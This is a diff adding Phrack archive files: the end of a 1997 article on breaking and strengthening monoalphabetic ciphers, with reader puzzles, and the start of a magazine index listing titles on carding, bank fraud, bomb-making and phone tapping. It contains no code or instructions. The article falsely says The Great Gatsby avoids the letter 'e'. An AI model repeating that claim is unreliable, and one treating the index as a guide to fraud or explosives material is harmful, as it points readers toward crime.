+Plaintext Alphabet	A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+Cypher Alphabet		Z I K M O Q S U W Y A C E B D F H J L N P R T V X G
+
+
+Plaintext Message
+
+The blue cow will rise during the second moon from the west field.
+
+Cyphertext Message
+
+nuo icpo kdt twcc jwlo mpjwbs nuo lokdbm eddb qjde nuo toln qwocm.
+
+
+-Cyclical Cyphers
+
+By taking an alphabet and aligning it with a rotated alphabet you get a 
+cyclical cypher.  For example:
+
+Plaintext Alphabet	A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+Cypher Alphabet		N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
+
+
+Indeed, you may recognize this cypher as a ROT13 which is commonly used on 
+news groups to obscure messages.
+
+
+-Keyed Cypher
+
+Another way to create a monoalphabetic cypher is to choose a keyword or phrase 
+as the beginning of the cypher alphabet. Usually, only the unique letters from 
+the phrase are used in order to make sure the plaintext to cyphertext behaves 
+in a one to one fashion.
+
+For example:
+
+Plaintext Alphabet:	A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+Cypher Alphabet		L E T O S H D G F W A R B C I J K M N P Q U V X Y Z
+
+The passphrase in this cypher is "Let loose the dogs of war"  The advantage of 
+such a system is that the encryption method is easy to remember.  Also, a 
+method of key change can be created without ever having to distribute the keys.
+For example, one could use the 4 words at a time of some piece of literature.  
+Every message could use the next four words.  Indeed, this change could occur 
+more frequently, but that is a subject for another article. 
+
+
+-Bipartite Substitution
+
+Bipartite substition is the use of symbol pairs to represent plaintext.  Later 
+we will see that this sort of substitution lends itself to be easily made more 
+difficult to analyze. Two examples of this are:
+
+  1 2 3 4 5	 		 		               A B C D E
+1 A B C D E						     A A B C D E 
+2 F G H I J						     B F G H I J
+3 K L M N O						     C K L M N O
+4 P Q R S T				or		     D P Q R S T
+5 U V W X Y						     E U V W X Y
+6 Z 0 1 2 3						     F Z 0 1 2 3
+7 4 5 6 7 8						     G 4 5 6 7 8
+9 9 . - ? ,						     H 9 . - ? ,
+
+
+Obviously, the letters do not need to be placed in this order as their solutions 
+would not be that difficult to guess.
+
+
+
+--Cryptanalysis
+
+
+Previously we created a cyphered message:
+
+nuo icpo kdt twcc jwlo mpjwbs nuo lokdbm eddb qjde nuo toln qwocm.
+
+
+If one were to receive this message, figuring out its contents might seem 
+fairly daunting. However,  there are some very good methods for recovering the 
+plaintext from the cyphertext. The following discussion will work under the 
+assumption that we know the cyphers with which we are dealing are 
+monoalphabetics.
+
+
+-Frequency Analysis
+
+The first method we will use is frequency analysis.  Natural languages have 
+many qualities which are very useful for the analysis of cyphertext.  Languages
+have letters which occur more commonly in text, collections of letters which 
+are more frequent,  patterns in words, and other related letter occurances.  
+
+Counting up the occurances of letters we find that there are...
+
+letter	occurances
+b		3
+c		4
+d		5
+e		2
+i		1
+j		3
+k		2
+l		3
+m		3
+n		4
+o		8
+p		2
+q		2
+s		1
+t		3
+u		3
+w		4
+
+The order of greatest frequency to least is:
+
+ 8   5     4          3           2       1
+{o} {d} {c n w} {b j l m t u} {e k p q} {i s} 
+
+
+If this sort of analysis were run on many volumes of english you would find that
+a pattern would emerge.  It would look like this:
+
+{e} {t} {a o i n} {s r h} {l d} {c u m f} {p g w y b} {v k} {x j q z}
+
+You will notice an immediate correlation between e and o.  However, for the 
+rest of the letters we can not be very certain.  In fact, we can not be very 
+certain about e either.
+
+Since this text is short it is helpful to take a look at some of the other 
+behaviors of this text.
+
+Counting up the first, second, third, and last letters of the words in this 
+text we find the following frequencies:
+
+
+First Letter in word		Occurances
+
+e					1
+i					1
+j					1
+k					1
+l					1
+m					1
+n					3
+q					2
+t					2
+
+Order:
+
+n q t e i j k l m
+
+
+Second letter in word		Occurances
+c					1
+d					2
+i					1
+n					1
+o					2
+p					1
+u					3
+w					3
+
+Order:
+
+u w d o c i n p
+
+
+Third letter in word		Occurances
+
+c					1
+d					2
+i					1
+k					1
+l					2
+o					4
+p					1
+t					1
+u					1
+
+Order:
+
+o d l c i k p t u
+
+
+Last letter in word		Occurances
+
+b					1
+c					1
+e					1
+m					1
+n					1
+o					5
+s					1
+t					1
+
+
+English frequency for first letter:
+
+t a o m h w 
+
+Second letter:
+
+h o e i a u 
+
+Third letter:
+
+e s a r n i
+
+Last letter:
+
+e t s d n r 
+
+Noticing the higher frequency count for 'o' in the third and last letters of 
+words in addition to its absence as a first letter in any words gives us strong
+reason to believe that 'o' substitutes for 'e'.  This is the first wedge into 
+solving this cypher.
+
+However, do not be fooled by the apparent strengths of frequency analysis.  
+Entire books have been written without the use of some letters in the English 
+alphabet.  For instance The Great Gatsby was written without using the letter 
+'e' in one word of the book.
+
+
+Other items to analyze in cyphertext documents is the appearance of letters in 
+groups.  These are called bigrams and trigrams.  For example, 'th' is a very 
+common letter pairing in the english language.  Also, as no surprise 'the' is 
+a very common trigram.  Analysis of english documents will find these results 
+for you.
+
+
+So now that that we have developed a simple way of starting to attack cyphers 
+lets examine a few ways to make them more difficult to break.
+
+
+--Strengthening Cyphers
+
+
+-Removing word and sentence boundaries
+
+A simple way to complicate decypherment of a cyphertext is to remove all 
+spacing and punctuation.  This makes it more difficult to perform a frequency 
+analysis on letter positions.  However, it is possible to make reasonable 
+guesses as to word positions once yoy begin to study the document.  Another 
+method is to break the cyphertext into fixed blocks.  For example after every 
+four letters a space is placed.
+
+The previous cypher text would appear as this:
+
+nuoicpokdttwccjwlompjwbsnuolokdbmeddbqjdenuotolnqwocm.
+
+
+or this:
+
+nuoi cpok dttw ccjw lomp jwbs nuol okdb medd bqjd enuo toln qwoc m
+
+
+You will notice that the above line ends with a single character.  This gives 
+away the end of the text and would be better served by the placement of nulls, 
+or garbage characters.  The above line becomes:
+
+nuoi cpok dttw ccjw lomp jwbs nuol okdb medd bqjd enuo toln qwoc mhew
+
+'hew' will decypher to 'qmi' which will clearly appear to be nulls to the 
+intended recipient.
+
+
+-Nulls
+
+Nulls are characters used in messages which have no meanings.  A message could 
+be sent which uses numbers as nulls. This makes decypherment more difficult as
+part of the message has no meaning.  Until the decypherer realizes this, he 
+may have a hard time of solving the message.
+
+
+-Polyphony
+
+Another method that can be applied is the use of polyphones.  Polyphones are 
+simply using a piece of cyphertext to represent more than one piece of 
+plaintext.  For example a cyphertext 'e' may represent an 'a' and a 'r'.  This 
+does complicate decypherment and may result in multiple messages.  This is 
+dangerous as these messages are prone to errors and may even decypher into 
+multiple texts.
+
+A new cyphertext alphabet would be
+
+Cyphertext alphabet	A B C D E F G H I J L N P
+Plaintext alphabet	Z X U S Q O M K H N R V W
+			B D F G I A C E L P J T Y
+
+Our old plaintext message becomes
+
+nih aich gfp peii ledh bclejd nih dhgfjb gffj clfg nih phdn cehib
+
+This decypherment becomes very tricky for someone to accomplish.  Having some 
+knowledge of the text would be a great help.
+
+If it appears that very few letters are being used in a document then you may 
+wish to suspect the use of polyphones within a document.
+
+
+-Homophones
+
+Homophones are similar to polyphones except that there is more than one 
+cyphertext letter for every plaintext letter.  They are useful to use in that 
+they can reduce the frequencies of letters in a message so that an analysis 
+yields little information.  This is very easy to do with bipartite 
+substitution cyphers.  For example:
+
+         a b c d e
+       a a b c d e
+       b f g h i j
+       c k l m n o
+       d p q r s t
+       e u v w x y
+       f z * * * *
+
+*(fb, fc, fd, fe are NULLS)
+
+We can add homophones to the message like this:
+
+          a b c d e
+
+ i h g a  a b c d e
+   k j b  f g h i j
+   n l c  k l m n o
+   o m d  p q r s t
+     p e  u v w x y
+       f  z * * * *
+
+The optimal way to set up these homophones is to calculate the frequency of 
+appearance in the natural language you are using of each row of letters.  
+Homophones should be added so that the cyphertext appearance of each homophone 
+is reduced to a level where frequency analysis would yield little information.
+
+
+-Code Words
+
+One final method which can be used is that of code words.  Simply replace 
+important words in the plaintext with code words which represent another word.
+For example the nonsense plaintext that has been chosen for this document could 
+actually mean:
+
+
+The blue cow will rise during the second moon from the west field.
+
+The king is angry and will attack in two weeks with the 1st calvary by way of 
+the foothills.
+
+blue is angry
+cow is king
+rise is attack
+second is two weeks
+moon is 1st calvary
+west field stands for some foothills on the west side of the kingdom.
+
+
+Throughout this document I have mentioned frequency analysis of english 
+documents.  This is a fairly tedious task to do by hand, and so I am 
+developing software to aid in frequency analysis of documents.  I will be 
+making it available via my website at http://www.cu-online.com/~jwthomp/ on 
+Monday, September 8th.  Please watch for it in the Cryptography section.
+
+
+Ok, now to try your hand at a few cyphertexts..
+
+This one has to do with war.
+1)
+kau noelb'd oerf xmtt okkopw ok qoxb euoqf kau kurhtoe wbmcakds, obq dkemwu amd
+podktu xamtu xu altq amr   
+
+
+This one is an excerpt from a technical document.
+2)
+etdsalwqs kpjsjljdq gwur orrh frurdjkrf sj qtkkjps npjtk ljeethalwsajhq   
+sgrqr kpjsjljdq tqr w jhr sj ewhy kwpwfane ijp spwhqeaqqajh sykalwddy tqahn 
+ldwqq f ahsrphrs kpjsjljd wffprqqrq sj qkrlaiy qkrlaial etdsalwqs npjtkq
+
+
+Mail me your answers and I'll put the first person who solves each cypher in 
+the next Phrack.
+
+In fact, I would enjoy seeing some participation in this for the next Phrack.  
+After reading this, I welcome the submission of any "Monoalphabetic" cypher 
+based on the discussions of this article.  Please do not yet submit any 
+polyalphabetic cyphers (Next article).  When submitting to me, please send me 
+two letters.  The first mail should include only the encyphered text.  Make 
+sure it is enough so that a reasonable examination can be made of the cypher.
+This first mail should have a subject "Cyphertext submission".  If you are 
+using a method of encypherment not found in this article, please enclose a 
+brief description of the type of method you used.  Follow this mail up with 
+another entitled "Cyphertext Solution" along with a description of the 
+encyphering method as well as the key or table used.
+
+I will select a number of these texts to be printed in the next Phrack, where
+readers may have a chance at solving the cyphers.  The reason I ask for two
+seperate mailing is that I will want to take a crack at these myself.  Finally,
+the names of individuals will be placed in the following phrack of the first
+to solve each cypher, and whomever solves the most cyphers prior to the next
+Phrack release (real name or pseudonym is fine).
+
+
+Please mail all submissions to jwthomp@cu-online.com
+
+I welcome any comments, suggestions, questions, or whatever at 
+jwthomp@cu-online.com
+
+
+----[  EOF
+
diff --git a/phrack51/14.txt b/phrack51/14.txt
new file mode 100644
index 0000000..9bc954a
--- /dev/null
+++ b/phrack51/14.txt
@@ -0,0 +1,2156 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 14 of 17
+
+
+-------------------------[  P H R A C K   I N D E X   G U I D E
+
+
+--------[  Guyver
+
+
+
+                                   -=Guyver=-
+                                P r e s e n t s
+
+              #####    ##  ##   #####    ###       ####    ##  ##
+              ##  ##   ##  ##   ##  ##   ####     ##  ##   ## ##
+              ##  ##   ##  ##   ##  ##   ##  ##   ##       ####
+              #####    ######   #####    ######   ##       ###
+              ##       ##  ##   ## ##    ##  ##   ##  ##   ####
+              ##       ##  ##   ##  ##   ##  ##    ####    ## ##
+
+                             MAGAZINE INDEX GUIDE
+
+                               2nd edition 1997
+
+      Phrack 1-50, Articles indexed according to author, subject, and title.
+
+          KEY: I1 F1 2k = Issue 1 File 1 of Phrack k=kilobytes long
+
+
+                                   ** A **
+
+
+"The ABCs of Better Hotel Staying" by Seven Up. 1994. I46 F25 12k
+"Accessing Government Computers" by The Sorceress. 1988. I17 F7 9k
+"Acronyms [from Metal Shop Private BBS]" 1988. I20 F11 43k
+"Acronyms Part I" by Firm G.R.A.S.P.. 1993. I43 F21 50k
+"Acronyms Part II" by Firm G.R.A.S.P.. 1993. I43 F22 51k
+"Acronyms Part III" by Firm G.R.A.S.P.. 1993. I43 F23 45k
+"Acronyms Part IV" by Firm G.R.A.S.P.. 1993. I43 F24 52k
+"Acronyms Part V" by Firm G.R.A.S.P.. 1993. I43 F25 46k
+"Advanced BITNET Procedures" by VAXBusters International. 1989. I24 F7 9k
+"Advanced Carding XIV" by The Disk Jockey. 1987. I15 F4 12k
+"Advanced Modem-Oriented BBS Security" by Laughing Gas & Dead Cow. 1991
+ I34 F9 11k
+Agent 005 authored
+        "Interview With Agent Steal" 1993. I44 F16 14k
+Agent Steal authored
+        "Tapping Telephone Lines" 1987. I16 F6 9k
+"Air Fone Frequencies" by Leroy Donnelly. 1992 I39 F8 14k
+"AIS - Automatic Intercept System" by Taran King. 1987. I11 F6 16k
+Al Capone authored
+        "Searching The Dialog Information Service" 1993. I44 F18 48k
+Aleph1 authored
+        "Smashing The Stack For Fun And Profit" 1996. I49 F14 66k
+Aleph1 was Pro-Philed in 1997. I50 F4 7k
+alhambra authored
+        "SNMP insecurities" 1997. I50 F7 20k
+        "Phrack World News" 1997. I50 F15 110k
+   co-authored
+        "Project Loki: ICMP Tunneling" 1996. I49 F7 38k        
+Alpine Kracker authored
+        "Smoke Bombs" 1986. I6 F6 2k
+Amadeus submitted 
+        "Cellular Spoofing by Electronic Serial Numbers" 1987. I11 F9
+        "Telenet/Sprintnet's PC Pursuit Outdial Directory" 1991. I35 F4 90k
+
+ANARCHY
+(See also CREDIT CARDING, DRUGS, EXPLOSIVES, HACKING, LOCK PICKING, PHREAKING,
+ WEAPONS)
+   "Breaching and Clearing Obstacles" by Taran King. 1986. I4 F5 7k
+   "Consensual Realities in Cyberspace" by Paul Saffo. 1989. I30 F8 11k
+   "Eavesdropping" by Circle Lord. 1986. I3 F7 3k
+   "False Identification" by Forest Ranger. 1986. I4 F3 3k
+   "Fun With Lighters" by The Leftist. 1986. I6 F4 2k
+   "Hand to Hand Combat" by Bad Boy in Black. 1986. I5 F4 13k
+   "Phone Bugging: Telecom's Underground Industry" by Split Decision. 1989.
+      I26 F7
+   "Social Security Number Formatting" by Shooting Shark. 1988. I19 F4 3k
+   "Social Security Numbers & Privacy" by Chris Hibbert of CPSR. 1991.
+    I35 F6 13k
+   "Tapping Telephone Lines" by Agent Steal. 1987. I16 F6 9k
+   "The Technical Revolution" by Dr. Crash. 1986. I6 F3 4k
+   "The Truth About Lie Detectors" by Razor's Edge. 1989. I30 F9 15k
+
+"Are You a Phone Geek?" by Doom Prophet. 1987. I13 F7 9k
+Aristotle was Pro-Philed in 1992 I38 F3 6k
+Armitage authored
+        "The Glenayre GL3000 Paging and Voice retrieval System" 1995.          
+         I47 F14 25k
+"The Art of Investigation" by Butler. 1990. I32 F4 18k
+"The Art of Junction Box Modeming" by Mad Hacker 616. 1986. I8 F5 6k
+"AT&T Definity System 75/85" by Erudite. 1994. I46 F25 35k
+"The AT&T Mail Gateway" by Robert Alien. 1991 I34 F4 5k
+"Auto-Answer It" by Twisted Pair. 1991. I35 F9 10k
+"Automatic Number Identification" by Phantom Phreaker and Doom Prophet. 1987.
+ I10 F7 9k
+"Automatic Teller Machine Cards" by Jester Sluggo. 1990. I32 F6 16k
+
+
+                                   ** B **
+
+
+Bad Boy in Black authored 
+        "Hand to Hand Combat" 1986. I5 F4 13k
+
+BANK FRAUD
+   "Automatic Teller Machine Cards" by Jester Sluggo. 1990. I32 F6 16k
+   "Bank Information" compiled by Legion of Doom!. 1989. I29 F6 12k
+   "Fun With Automatic Tellers" by The Mentor. 1986. I8 F7 7k
+   "How We Got Rich Through Electronic Fund Transfer" by Legion of Doom!.
+    1990. I29 F7 11k
+   "Introduction to the FedLine software system" by Parmaster. 1996.
+    I49 F12 19k
+
+"Bank Information" compiled by Legion of Doom!. 1989. I29 F6 12k
+"Basic Commands for The VOS System" by Dr. No-Good. 1992. I37 F8 10k
+"Basic Concepts of Translation" by The Dead Lord and Chief Executive Officers.
+ 1989. I26 F6 20k
+"Beating The Radar Rap Part 1/2" by Dispater. 1992. I27 F5 12k 44k
+"Beating The Radar Rap Part 2/2" by Dispater. 1992. I28 F6 5k 15k
+"A Beginner's Guide to The IBM VM/370" by Elric of Imrryr. 1987. I10 F4 4k
+"A Beginner's Guide to Novell Netware 386" by The Butler. 1991. I35 F8 84k
+"Bell Network Switching Systems" by Taran King. 1989. I25 F3 16k
+"BELLCORE Information" by The Mad Phone-Man. 1987. I16 F2 11k
+"Big BroTher Online" by Thumpr (Special thanks to Hatchet Molly). 1989.
+ I23 F10
+Bill Huttig authored
+        "Special Area Codes II" 1992. I39 F7 17k
+
+BITNET see WIDE AREA NETWORKS
+
+Black Kat authored
+        "Users Guide to VAX/VMS Part 1/3" 1991 I35 F7 62k
+        "Users Guide to VAX/VMS Part 2/3" 1992 I37 F7 25k
+        "Users Guide to VAX/VMS Part 3/3" 1992 I38 F7 46k
+Black Knight from 713 authored 
+        "Hacking Voice Mail Systems" 1987. I11 F4 6k
+Black Tie Affair authored 
+        "Hiding Out Under Unix" 1989. I25 F6 9k
+"Blocking of Long Distance Calls" by Jim Schmickley. 1988. I21 F8 26k
+"Blocking of Long Distance Calls... Revisited" by Jim Schmickley. 1989.
+ I29 F9 22k
+"Blowguns" by The Pyro. 1985. I2 F4 3K 3K
+"The Blue Box and Ma Bell" by The Noid. 1989. I25 F7 19k
+Bob Page authored 
+        "A Report on The Internet Worm" 1988. I22 F8 16k
+Bobby Zero authored
+        "Security Shortcomings of AppleShare Networks" 1992. I41 F9 16k
+"Bolt Bombs" by The Leftist. 1986. I5 F6 3k
+Boss Hogg authored
+        "The Craft Acces Terminal" 1996. I48 F8 36k
+"Boot Tracing" by Cheap Shades. 1985. I1 F3 8k
+"Box.exe for SoundBlasters"<unencoded> by The Fixer. 1994. I45 F22 13k
+"Breaching and Clearing Obstacles" by Taran King. 1986. I4 F5 7k
+Broadway Hacker Pro-Philed in 1986. I5 F2 5k
+Brian Oblivion authored
+        "Cellular Telephony" 1992. I38 F9 28k
+        "Cellular Telephony Part II" 1992. I40 F6 72k        
+        "DIALOG Information Network" 1992. I39 F5 43k
+Brigadier General Swipe authored
+        "An Introduction to MILNET" 1991 I34 F7 8k
+Bruce Sterling authored
+        "Phrack World News Special Edition IV" (CyberView '91) 1991. I33 F10 28k
+"BT Tymnet, Part 1/3" by Toucan Jones. 1992. I40 F8 57k
+"BT Tymnet, Part 2/3" by Toucan Jones. 1992. I40 F9 55k
+"BT Tymnet, Part 3/3" by Toucan Jones. 1992. I40 F10 91k
+"Building a Shock Rod" by Circle Lord. 1986. I3 F8 3k
+"Busy Line Verification" by Phantom Phreaker. 1987. I11 F10 10k
+"Busy Line Verification Part II" by Phantom Phreaker. 1987. I12 F8 9k
+Butler authored 
+        "The Art of Investigation" 1990. I32 F4 18k
+        "A Beginners Guide to Novell Netware 386" 1991. I35 F8 84k
+
+
+                                   ** C **
+
+CABLE
+   "A Guide To Porno Boxes" By Carl Corey. 1994. I46 F10 13k
+
+Caligula XXI authored
+        "Mall Cop Frequencies" 1992. I41 F10 11k
+"Can You Find Out If Your Telephone is Tapped?" by Fred P. Graham and VaxCat
+ 1989. I23 F9 20k
+Cap'n Crax authored 
+        "The TMC Primer" 1987. I10 F3 6k
+
+CARDING
+   "Advanced Carding XIV" by The Disk Jockey. 1987. I15 F4 12k
+   "Credit Card Laws" by Tom Brokow. 1987. I16 F5 7k
+   "Card-O-Rama:Magnetic Stripe Technology and Beyond" by Count Zero. 1992.
+    I37 F6 44k
+   "MCI International Cards" by Knight Lightning. 1985. I1 F5 3k
+   "Safe and Easy Carding" by Vaxbuster. 1993. I44 F20 18k
+   "VisaNet Operations Part I" by Ice Jey. 1994. I46 F15 50k
+   "VisaNet Operations Part 2" by Ice Jey. 1994. I46 F16 44k
+
+"Card-O-Rama:Magnetic Stripe Technology and Beyond" by Count Zero. 1992.
+ I37 F6 44k
+
+CARD GAMES
+        "How To Hack Blackjack Part I" by Lex Luthor. 1993. I43 F9 52k
+        "How To Hack Blackjack Part II" by Lex Luthor. 1993. I43 F10 50k
+        
+Carl Corey authored
+        "A Guide To Porno Boxes" 1994. I46 F10 13k    
+Carrier Culprit authored
+        "Hacking DEC's" 1986. I5 F3 23k
+The Cavalier authored
+        "How to Build a DMS-10 Switch" 1992 I41 F7 23k
+        "Introdcution to Telephony and PBX Systems" 1996. I49 F5 100k
+"Cellular Debug Mode Commands" by Various Sources. 1994. I45 F26 13k
+"Cellular Info" by Madjus(N.O.D.). 1993. I43 F17 47k
+"Cellular Spoofing by Electronic Serial Numbers" by Author Unknown.
+ 1985. I11 F9 submitted by Amadeus
+"Cellular Telephones" by High Evolutionary. 1986. I6 F7 5k
+"Cellular Telephony" by Brian Oblivion. 1992. I38 F9 28k
+"Cellular Telephony Part II" by Brian Oblivion. 1992. I40 F6 72k
+
+CELLULAR TELEPHONY
+   "Air Fone Frequencies" by Leroy Donnelly. 1992 I39 F8 14k
+   "Cellular Debug Mode Commands" by Various Sources. 1994. I45 F26 13k
+   "Cellular Info" by Madjus(N.O.D.). 1993. I43 F17 47k
+   "Cellular Spoofing by Electronic Serial Numbers" by ?. 1985. I11 F9
+      submitted by Amadeus
+   "Cellular Telephones" by High Evolutionary. 1986. I6 F7 5k
+   "Cellular Telephony" by Brian Oblivion. 1992. I38 F9 28k
+   "Cellular Telephony Part II" by Brian Oblivion. 1992. I40 F6 72k
+   "Mobile Telephone Communications" by Phantom Phreaker. 1986. I5 F9 11k
+   "Motorola Command Mode Information" by Cherokee. 1996. I48 F6 38k     
+   "Tandy/Radio Shack Cellular Phones" by Damien Thorn. 1996. I48 F7 43k
+
+"Centrex Renaissance" by Jester Sluggo. 1986. I4 F7 17k
+"Centigram Voice Mail System Consoles" by >Unknown User<. 1992. I39 F6 36k
+Charlie X authored
+        "Screwing Over Your Local McDonalds" 1994. I45 F19. 20k
+Cheap Shades authored
+        "Boot Tracing" 1985. I1 F3 8k
+        Introduction/Index for I3 F1
+   co-authored
+        "Welcome to Metal Shop Private" 1988. I20 F4 37k
+Cherokee authored
+        "Motorola Command Mode Information" 1996. I48 F6 38k
+Chief Executive Officers co-authored
+        "Basic Concepts of Translation" 1989. I29 F6 12k
+Crimson Flash authored
+        "The Fine Art of Telephony" 1992. I40 F7 65k
+Chris Goggans authored        
+        "Packet Switched Network Security" 1992. I42 F4 22k
+Chris Goggens was Pro-Philed in 1991. I35 F3 20k
+Chris Hibbert of CPSR authored
+        "Social Security Numbers & Privacy" 1991. I35 F6 13k
+Circle Lord authored  "Building a Shock Rod" 1986. I3 F8 3k
+        "Eavesdropping" 1986. I3 F7 3k
+"Circuit Switched Digital Capability" by The Executioner. 1987. I10 F5 12k
+"City-Wide Centrex" by The Executioner. 1986. I8 F3 14k
+cjml authored
+        "Steganography Improvement Proposal" by cjml. 1996. I49 F10 6k
+The Clashmaster authored
+        "How to Make Acetylene Bombs" 1985. I1 F7 4k
+Co/Dec authored
+        "Physical Access and Theft of PBX Systems" 1993. I43 F15 28k
+        "Fraudulent Applications of 900 Services" 1994. I45 F18 15k
+CODES
+   "MCI International Cards" by Knight Lightning. 1985. I1 F5 3k
+
+Compaq Disk(Crimson Death) co-authored
+        "Introduction to Diet Phrack" 1991. I36. F1 8k
+"The Complete Guide to Hacking WWIV" by Inhuman. 1991 I34 F5 20k
+"The Complete Guide to Hacking Meridian Voice Mail" by Substance. 1995.
+ I47 F15 10k
+"CompuServe Info" by Morgoth and Lotus. 1986. I8 F6 8k
+"The CompuServe Case" by Electronic Frontier Foundation. 1992. I37 F9 6k
+"Computer-Based Systems for Bell System Operation" by Taran King. 1989.
+ I20 F2
+"Computer Hackers Follow a Guttman-Like Progression" by Richard C. Hollinger
+ 1988. I22 F7 10k
+"Concerning Hackers Who Break Into Computer Systems" by Dorthy Denning. 1990.
+ I32 F3
+"Conference News Part I" by Various Sources. 1993. I43 F7 53k
+"Conference News Part II" by Various Sources. 1993. I43 F8 58k
+"Conference News Part I" by Various Sources. 1993. I44 F6 55k
+"Conference News Part II" by Various Sources. 1993. I44 F7 35k
+"Conference News Part III" by Various Sources. 1993. I44 F8 50k
+"The Conscience of a Hacker {Reprint}" by The Mentor. 1987. I14 F3 4k
+"Consensual Realities in Cyberspace" by Paul Saffo. 1989. I30 F8 11k
+"Content-Blind Cancelbot" by Dr. Dimitri Vulis. I49 F9 40k
+"Control Office Administration of Enhanced 911 Service" by The Eavesdropper.
+ 1989. I24 F6 12k
+Control C authored
+        "Digital Multiplexing Systems (Part 2)" 1988. I19 F3 18k
+        "Inside Dialog" 1986. I9 F5 8k
+        "Loop Maintenance Operating System" 1988. I18 F8 32k
+        "TRW Business Terminology" 1987. I14 F6 5k
+        "Understanding The Digital Multiplexing Systems (DMS)" 1987. I12 F4 19k
+        "Understanding DMS Part II" 1987. I14 F5 18k
+        "Computerists Underground News Tabloid - CUNT" by Crimson Death. 1987.
+         I13 F8 11k
+Control C was Pro-Philed in 1994. I44 F7 22k
+
+COSMOS
+   "COSMOS: COmputer System for Mainfrmae OperationS (Part One)" by
+    King Arthur. 1989. I26 F5 13k
+   "COSMOS: COmputer System for Mainframe OperationS (Part Two)" by
+    King Arthur. 1989. I27 F5 12k
+   "Cosmos Overview" by EBA. 1990. I31 F6 52k
+
+"COSMOS: COmputer System for Mainframe OperationS (Part One)" by King Arthur.
+ 1989. I26 F5 13k
+"COSMOS: COmputer System for Mainframe OperationS (Part Two)" by King Arthur.
+ 1989. I27 F5 12k
+Cosmos Kid authored 
+        "A Hacker's Guide to Primos: Part 1" 1987. I16 F3 11k
+"Cosmos Overview" by EBA. 1990. I31 F6 52k
+Count Zero authored
+        "Card-O-Rama:Magnetic Stripe Technology and Beyond" 1992. I37 F6 44k
+        "Phrack World News:Special Report VI on WeenieFest'92" 1992 I37 F10 14k
+        "HoHoCon" 1995. I48. F11 33k        
+"Covert Paths" by Cyber Neuron Limited and SynThecide. 1989. I29 F5 4k
+
+CRACKING (of software)
+   "Boot Tracing" by Cheap Shades. 1985. I1 F3 8k
+
+"Cracking NT Passwords" by Nihil. 1997. I50 F8 17k
+"The Craft Acces Terminal" by Boss Hogg. 1996. I48 F8 36k
+"Crashing DEC-10's" by The Mentor. 1986. I4 F6 5k
+
+CREDIT BUREAUS
+   "Hacking Chilton's Credimatic" by Ryche. 1986. I7 F4 8k
+   "Reading Trans-Union Credit Reports" by The Disc Jockey. 1987. I16 F7 6k
+   "TRW Business Terminology" by Control C. 1987. I14 F6 5k
+
+"Credit Card Laws" by Tom Brokow. 1987. I16 F5 7k
+
+CREDIT CARDING
+(see also CREDIT BUREAUS, CARDING)
+   "Advanced Carding XIV" by The Disk Jockey. 1987. I15 F4 12k
+   "Credit Card Laws" by Tom Brokow. 1987. I16 F5 7k
+   "The Postal Inspection Service" by Vendetta. 1989. I27 F9 14k
+
+Crimson Death was Pro-Philed in 1986. I4 F1
+Crimson Death (713) authored
+        "Computerists Underground News Tabloid - CUNT" 1987. I13 F8 11k
+        Introduction/Index for I18-19,32,34,35(co-authored) F1
+        "Phrack Classic Spotlight featuring Knight Lightning" 1990. I32 F2 32k
+        "Phrack Pro-Phile on Ax Murderer" 1988. I18 F2 4k
+        "Phrack Pro-Phile on Shooting Shark" 1991 I33 F2 16k
+        "Phrack World News" 1991. I33 F11 18k
+         "RSTS" 1990. I32 F9 23k
+   co-authored
+        Introduction/Index for I18-19,32,34,35 F1        
+"CSDC II - Hardware Requirements" by The Executioner. 1987. I12 F6 8k
+
+CULTURE (of hacking)
+(See also International Scenes, Phrack World News, Phrack Pro-Phile)
+   "10th Chaos Computer Congress" by Manny E. Farber. 1994. I45 F13 23k
+   "The ABCs of Better Hotel Staying" by Seven Up. 1994. I46 F25 12k
+   "Acronyms [from Metal Shop Private BBS]" 1988. I20 F11 43k
+   "Are You a Phone Geek" by Doom Prophet. 1987. I13 F7 9k
+   "Big BroTher Online" by Thumpr (Special thanks to Hatchet Molly). 1989.
+      I23 F10
+   "Concerning Hackers Who Break Into Computer Systems" by Dorthy Denning.
+      1990. I32 F3 60k
+   "Computer Hackers Follow a Guttman-Like Progression" by Richard C.
+      Hollinger. 1988. I22 F7 10k
+   "Computerists Underground New Tabloids - CUNT" by Crimson Death. 1987.
+      I13 F8 11k
+   "The Conscience of a Hacker {Reprint}" by The Mentor. 1987. I14 F3 4k
+   "Cyber Christ Meets Lady Luck Part I" by Winn Schwartau. 1994. I46 F19 45k
+   "Cyber Christ Meets Lady Luck Part II" by Winn Schwartau. 1994. I46 F20 42k
+   "Cyber Christ Bites The Big Apple" by Winn Schwartau. 1994. I46 F23 60k
+   "Defcon Information" by Various Sources. 1995. I47 F9 28k
+   "Defcon II Information" by Various Sources. 1994. I45 F14 26k
+   "*ELITE* Access" by Dead Lord and Lord Digital(Lords Anonymous!). 1991.     
+    I36 F5 43k
+   "The Freedom of Information Act and You" by Vince Niel. 1992. I42 F12 42k
+   "The Groom Lake Desert Rat" by PsychoSpy. 1994. I46 F21 44k
+   "Hacker's Manifesto" by The Mentor. 1986. I7 F3 4k
+   "The History of The Legion of Doom" 1990. I31 F5 10k
+   "HoHoCon" by Netta Gilboa. 1995. I47. F10 30k
+   "HoHoCon" by Count Zero. 1995. I48. F11 33k
+   "HoHoCon"(review) by Various Sources. 1992. I42 F13 51k
+   "HoHoCon Miscellany" by Various Sources. 1994. I45 F11 32k
+   "HoHoCon Miscellany" by Various Sources. 1995. I47 F12 33k
+   "Hollywood-Style Bits & Bytes" by Richard Goodwin. 1994. I45 F17 50k
+   "HOPE" by Erik Bloodaxe. 1994. I46 F22 51k
+   "How to Fuck Up The World - A Parody" by Thomas Covenant. 1987. I13 F3 10k
+   "The Judas Contract (Part 2 of The Vicious Circle Trilogy)" by Knight
+      Lightning. 1988. I22 F3 26k
+   "LODCOM BBS Archive Info" by LOD. 1993. I43 F18 24k
+   "LOD Communications BBS Archive Information" by LOD. 1993. I44 F22 29k
+   "The Legion of Doom & The Occult" by LOD and Demon Seed Elite. 1991         
+    I36 F6 24k
+   "LODCOM Sample Messages" by LOD. 1993. I43 F19 52k
+   "The Making of a Hacker" by Framstag. 1989. I27 F7 9k
+   "Metal/General Discussion [from Metal Shop Private BBS]" 1988. I20 F5 66k
+   "New Users [from Metal Shop Private BBS]" 1988. I20 F9 17k
